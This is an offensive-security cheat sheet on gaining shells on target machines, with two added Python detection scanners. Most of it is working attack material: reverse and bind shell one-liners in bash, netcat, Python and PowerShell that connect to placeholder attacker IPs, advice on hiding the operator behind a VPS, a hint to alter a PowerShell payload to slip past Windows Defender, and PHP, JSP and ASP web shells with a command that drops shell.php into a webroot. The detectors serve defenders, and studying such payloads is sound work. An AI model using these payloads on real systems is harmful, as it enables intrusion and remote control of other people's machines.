USING ZSH

Using zsh instead of bash on your host requires a slight adjustment to the usual session upgrade when you call bash in the target terminal. Running stty raw -echo and then fg as separate commands does not work under zsh; use a one-liner:


python -c 'import pty; pty.spawn("/bin/bash")'
ctrl-Z
stty raw -echo ; fg
[Enter]
[Enter]
export TERM={your host TERM}

Reverse Shell


The easiest of the three (reverse, bind and web shell) to trigger. You upload or overwrite a file you can execute remotely, or run a command on the target, so that the target initiates a connection back to you. Beforehand you set up a listener on your host to accept the incoming connection.

Connect Back IP

Make sure the target can reach the IP of your listening machine. Either you are on the same private network, or you have a VPS (which the target can reach) that pivots the connection on to your host. If the target can reach you directly, use your own IP and skip the following setup:

VPS is great

By forwarding the connection from the VPS to your host over an SSH tunnel, the target only sees the VPS IP, not yours. This is a good way to keep your real host hidden.

Setup example of VPS remote port forwarding:

  1. On host (forward connections to port 9000 on the VPS to port 4444 on the host using SSH):
ssh -R 9000:localhost:4444 user@vps
nc -lvp 4444
  2. On VPS:
nc -lvp 9000
  3. On target (see the shells page for a payload list depending on the target):
bash -i >& /dev/tcp/VPS_IP/9000 0>&1

Reverse Shell Command

Usual payloads to run on the target machine:

bash -c 'bash -i >& /dev/tcp/<insert attacker IP>/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Windows Defender

This PowerShell payload is flagged by Windows Defender; you need to tweak its content for it to run.

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Bind Shell


The opposite of the reverse shell: you are the one connecting to the target, which is listening. The payloads are mostly the same as for a reverse shell, with the parameters adapted accordingly. A bind shell's advantage is that you can drop the connection and connect again, since the target keeps listening, whereas with a reverse shell you would have to trigger the exploit again.

Netcat Connection

Since the target is the one accepting the connection this time, the Netcat command to use is

nc <target IP> <target port>

Bind Shell Command

Usual payloads to run on the target machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
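The payloads in the reverse and bind shell sections are also what a defender looks for in process telemetry. The scanner below is an added example, not part of the original notes: it matches those payload styles against constructed process-execution events (the key=value log format and the sample lines are assumptions for this example) and labels each hit as reverse, bind or a TTY upgrade.

```python
import re

# Signatures for the payload styles listed above. Constructed for this example;
# tune them to your own telemetry before relying on them.
SIGNATURES = {
    "bash_dev_tcp":    re.compile(r"/dev/tcp/\S+/\d+"),
    "fifo_netcat":     re.compile(r"\bmkfifo\s+\S+.*\|\s*nc\b"),
    "netcat_listener": re.compile(r"\bnc\s+-[a-zA-Z]*l"),
    "pty_spawn":       re.compile(r"pty\.spawn\("),
    "py_socket_shell": re.compile(r"\bsocket\b.*\bPopen\(.*shell=True", re.S),
    "ps_tcp_client":   re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "ps_tcp_listener": re.compile(r"System\.Net\.Sockets\.TcpListener", re.I),
}
BIND_TAGS = {"netcat_listener", "py_socket_shell", "ps_tcp_listener"}
REVERSE_TAGS = {"bash_dev_tcp", "fifo_netcat", "ps_tcp_client"}

def classify_cmdline(cmdline):
    """Return the set of signature names matching one process command line."""
    return {name for name, rx in SIGNATURES.items() if rx.search(cmdline)}

def shell_direction(tags):
    """Label a hit; listener patterns win because the fifo pattern fits both directions."""
    if tags & BIND_TAGS:
        return "bind"
    if tags & REVERSE_TAGS:
        return "reverse"
    return "tty_upgrade" if tags else None

def parse_event(line):
    """Split one constructed 'key=value ... cmd=<command line>' event line."""
    head, _, cmd = line.partition(" cmd=")
    return dict(kv.split("=", 1) for kv in head.split()), cmd

def scan_events(lines):
    """Return (pid, user, direction, sorted tags) for every event that matches."""
    alerts = []
    for line in lines:
        fields, cmd = parse_event(line)
        tags = classify_cmdline(cmd)
        if tags:
            alerts.append((fields["pid"], fields["user"], shell_direction(tags), sorted(tags)))
    return alerts

# Constructed sample events: three payloads from this page plus two benign commands.
SAMPLE_EVENTS = [
    "ts=2024-05-01T10:00:01Z host=web01 pid=101 user=www-data cmd=bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'",
    "ts=2024-05-01T10:00:02Z host=web01 pid=102 user=www-data cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f",
    "ts=2024-05-01T10:00:03Z host=web01 pid=103 user=www-data cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "ts=2024-05-01T10:00:04Z host=web01 pid=104 user=root cmd=nc -zv db01 5432",
    "ts=2024-05-01T10:00:05Z host=web01 pid=105 user=deploy cmd=git pull origin main",
]
```

Running scan_events(SAMPLE_EVENTS) flags pids 101, 102 and 103 and leaves the port check and the git pull alone.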

Web Shell


Web shells are useful when the server configuration disallows commands like bash, python, netcat or sh. A noexec mount option also prevents running such commands (but a web shell can still run them when the command is triggered through a PHP or Python process, provided no restriction such as PHP's disable_functions is set).

Many other controls can block a remote shell (reverse or bind), which is where a web shell comes in handy. They are used by injecting a payload into unsanitised GET or POST parameters that end up being concatenated into a command.

Writing a Web Shell

Examples of web shell payloads:

<?php system($_REQUEST["cmd"]); ?>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
<% eval request("cmd") %>

Uploading a Web Shell

If you can upload a file that is reachable afterwards and executed by the server (as with PHP), you can effectively get back the output of the commands you supply. If you already have RCE but under constraints, you can write the file into the webroot directory, which gives you more stable and possibly less restricted command execution through the written file. The webroot depends on the web server in use, which brings us back to the importance of service scanning.

Web Server   Default Webroot
Apache       /var/www/html/
Nginx        /usr/local/nginx/html/
IIS          c:\inetpub\wwwroot
XAMPP        C:\xampp\htdocs

A typical malicious PHP file would be written with this payload:
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
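Because these payloads end up as files under the webroot, scanning that directory for them is the matching defensive check. The scanner below is an added example, not part of the original notes; it looks for the three web shell signatures from this page (plus the common PHP exec functions) in a throwaway webroot built from constructed files, so the paths and file contents are assumptions for this example.

```python
import os, re, tempfile

# Web shell signatures derived from the payload styles shown on this page.
# Constructed for this example; a real scanner needs a much larger rule set.
WEBSHELL_SIGNATURES = {
    "php_exec_from_request": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    "php_eval_from_request": re.compile(r"\beval\s*\(.*\$_(GET|POST|REQUEST)\b"),
    "jsp_runtime_exec": re.compile(
        r"Runtime\.getRuntime\(\)\.exec\s*\(.*request\.getParameter", re.S),
    "asp_eval_request": re.compile(r"\beval\s+request\s*\(", re.I),
}
SCAN_EXTENSIONS = {".php", ".phtml", ".jsp", ".asp", ".aspx"}

def scan_file(path):
    """Return the sorted signature names found in one file (empty list if clean)."""
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    return sorted(n for n, rx in WEBSHELL_SIGNATURES.items() if rx.search(text))

def scan_webroot(root):
    """Walk root and return [(relative path, [signatures])] for every executable-type hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue  # .txt and friends are not executed by the server
            full = os.path.join(dirpath, name)
            tags = scan_file(full)
            if tags:
                hits.append((os.path.relpath(full, root).replace(os.sep, "/"), tags))
    return sorted(hits)

def build_demo_webroot():
    """Create a throwaway webroot of constructed files: one clean page, three shells, one decoy."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    os.makedirs(os.path.join(root, "uploads"))
    files = {
        "index.php": "<?php echo htmlspecialchars($_GET['name'] ?? ''); ?>",
        "uploads/shell.php": '<?php system($_REQUEST["cmd"]); ?>',
        "uploads/cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
        "uploads/cmd.asp": '<% eval request("cmd") %>',
        "notes.txt": "system($_REQUEST) mentioned here, but .txt is never executed",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root
```

scan_webroot(build_demo_webroot()) reports the three files under uploads/ and nothing else.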

Accessing Web Shell

Request the uploaded file through a browser or cURL and pass the command you wish to execute in the cmd parameter. The output appears in the response; rinse and repeat as needed.